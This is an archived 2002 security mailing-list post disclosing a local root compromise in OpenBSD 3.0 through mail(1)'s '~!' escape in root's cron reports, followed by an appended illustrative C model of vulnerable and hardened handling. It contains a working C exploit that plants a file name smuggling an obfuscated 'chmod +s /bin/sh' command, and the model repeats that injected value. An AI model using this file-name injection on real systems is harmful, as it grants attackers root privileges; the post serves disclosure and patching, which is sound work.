local root compromise in openbsd 3.0 and below

From: Przemyslaw Frasunek (venglinat_private)
Date: Thu Apr 11 2002 - 04:29:28 PDT


    There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
    2002). 
    
    Full problem report and exploit below. FreeBSD is not vulnerable.
    
    ----- Forwarded message from urbanekat_private -----
    
    From: urbanekat_private
    To: gnatsat_private
    Subject: user/2536: possible root compromise using /usr/bin/mail 
    
    >Number:         2536
    >Category:       user
    >Synopsis:       crontab entry allows possible arbitrary command execution
    >Confidential:   yes
    >Severity:       critical
    >Priority:       high
    >Responsible:    bugs
    >State:          open
    >Class:          sw-bug
    >Submitter-Id:   net
    >Arrival-Date:   Mon Apr  8 13:30:02 MDT 2002
    >Last-Modified:
    >Originator:     Milos Urbanek
    >Organization:
    
    >Release:        all releases including CURRENT
    >Environment:
    	
    	System      : OpenBSD 3.0
    	Architecture: OpenBSD.i386
    	Machine     : i386
    >Description:
    
            program /usr/bin/mail allows a special escape sequence to
            be specified in the body of an email; this escape sequence
            specifies a shell command to be executed
    
            as mentioned in mail(1):
    
    ~!command
                 Execute the indicated shell command, then return to the message.
    
    
            Problem:
            default root crontab entry looks like:
    
            # do daily/weekly/monthly maintenance
            # on monday only (techie)
            30      1       *       *       1       /bin/sh /etc/daily 2>&1 | tee /var/log/daily.out | mail -s "`/bin/hostname` daily output" root
            30      3       *       *       6       /bin/sh /etc/weekly 2>&1 | tee /var/log/weekly.out | mail -s "`/bin/hostname` weekly output" root
            30      5       1       *       *       /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root
    
    
            If there is something in files /etc/daily, /etc/weekly or /etc/monthly
            which could enable the attacker to insert their own input,
            like a malformed filename
    
            chiba:5$ touch \~!haha
            chiba:6$ ls -al *haha*
            -rw-r--r--  1 milos  milos  0 Apr  8 19:30 ~!haha
    
            or by other means like output from log files under /var/log,
    
            the attacker can execute an arbitrary command with root
            privileges, which can lead to root compromise.
    
    
    >How-To-Repeat:
            read the man page, and see above
    [...]
    
    ----- End forwarded message -----
    
    Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
    
    Exploit:
    
    /*
     * (c) 2002 venglinat_private
     *
     * OpenBSD 3.0 (before 08 Apr 2002)
     * /etc/security + /usr/bin/mail local root exploit
     *
     * Run the exploit and wait for /etc/daily executed from crontab.
     * /bin/sh will be suid root next day morning.
     *
     * Credit goes to urbanekat_private for discovering vulnerability.
     *
     */
    
    #include <fcntl.h>
    #include <unistd.h>
    
    int main(void)
    {
    	int fd;
    
    	chdir("/tmp");
    	/*
    	 * The file name starts with a newline so that "~!" lands at the
    	 * beginning of a line when /etc/security lists the file; mode 04777
    	 * makes it show up as a new setuid file in that report. The octal
    	 * escapes decode to "/bin/sh".
    	 */
    	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
    
    	if (fd != -1)
    		close(fd);
    
    	return 0;
    }
    
    -- 
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
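Added illustration, not part of the post above and not OpenBSD's collect.c: the C below models the two halves of the bug the report describes. A line of the message body that begins with "~!" is a request to run a shell command; the vulnerable model honours it no matter where the body came from, the hardened model honours it only when the body is being typed at a terminal. Neither function executes anything, they return the command that would be run, so the difference can be asserted on. The function names (collect_vulnerable, collect_hardened, build_trap_report), the sample "setuid additions" report body, and the interactive-only guard are all assumptions of this example; the guard is inferred from the advisory, not copied from the linked diff.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* mail(1)'s escape character; escapes are only recognised at the
 * beginning of a line of the message body. */
#define ESCAPE '~'

/* If LINE is a "~!command" escape, return a malloc'd copy of the command
 * (up to the end of the line); otherwise return NULL. */
static char *tilde_shell_command(const char *line)
{
    if (line[0] != ESCAPE || line[1] != '!')
        return NULL;
    const char *cmd = line + 2;
    size_t len = strcspn(cmd, "\n");
    char *out = malloc(len + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, cmd, len);
    out[len] = '\0';
    return out;
}

/* Walk BODY line by line and return the first shell command an escape
 * requests, or NULL when no line is an escape. Nothing is executed. */
static char *first_escape(const char *body)
{
    const char *line = body;
    while (*line != '\0') {
        char *cmd = tilde_shell_command(line);
        if (cmd != NULL)
            return cmd;
        const char *nl = strchr(line, '\n');
        if (nl == NULL)
            break;
        line = nl + 1;
    }
    return NULL;
}

/* Vulnerable model: escapes honoured regardless of where the body came
 * from, so "mail -s ... root" fed by the cron pipeline would run the
 * attacker's command as root. */
char *collect_vulnerable(const char *body)
{
    return first_escape(body);
}

/* Hardened model (assumed guard, not the OpenBSD diff): honour escapes
 * only when the user is typing the body at a terminal. A piped body,
 * as in the root crontab, is plain text. */
char *collect_hardened(const char *body, int interactive)
{
    if (!interactive)
        return NULL;
    return first_escape(body);
}

/* Constructed sample: the body a report like /etc/security's would
 * produce if it printed the attacker's file name verbatim. The name
 * starts with a newline so "~!..." lands at the beginning of a line,
 * exactly as the exploit's open() call arranges; the command is the
 * exploit's, with "/bin/sh" written out instead of octal-escaped. */
int build_trap_report(char *buf, size_t bufsz)
{
    const char *trap_name = "\n~!chmod +s /bin/sh\n";
    return snprintf(buf, bufsz,
                    "Setuid additions:\n"
                    "-rwsrwsrwx  1 milos  milos  0 Apr  8 19:30 /tmp/%s",
                    trap_name);
}

int main(void)
{
    char body[512];
    if (build_trap_report(body, sizeof body) <= 0)
        return 1;
    char *v = collect_vulnerable(body);
    char *h = collect_hardened(body, 0);   /* cron pipeline: stdin is not a tty */
    printf("vulnerable mail would run: %s\n", v ? v : "(nothing)");
    printf("hardened mail would run:   %s\n", h ? h : "(nothing)");
    free(v);
    free(h);
    return 0;
}
```

The point the model makes explicit is that the injection needs nothing from mail(1) itself: any program in the pipeline that echoes an attacker-controlled string with an embedded newline puts "~!" at the start of a body line, and the only robust fix is on the consumer side, refusing escapes when the body is not interactive.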
    



    This archive was generated by hypermail 2b30 : Thu Apr 11 2002 - 14:05:45 PDT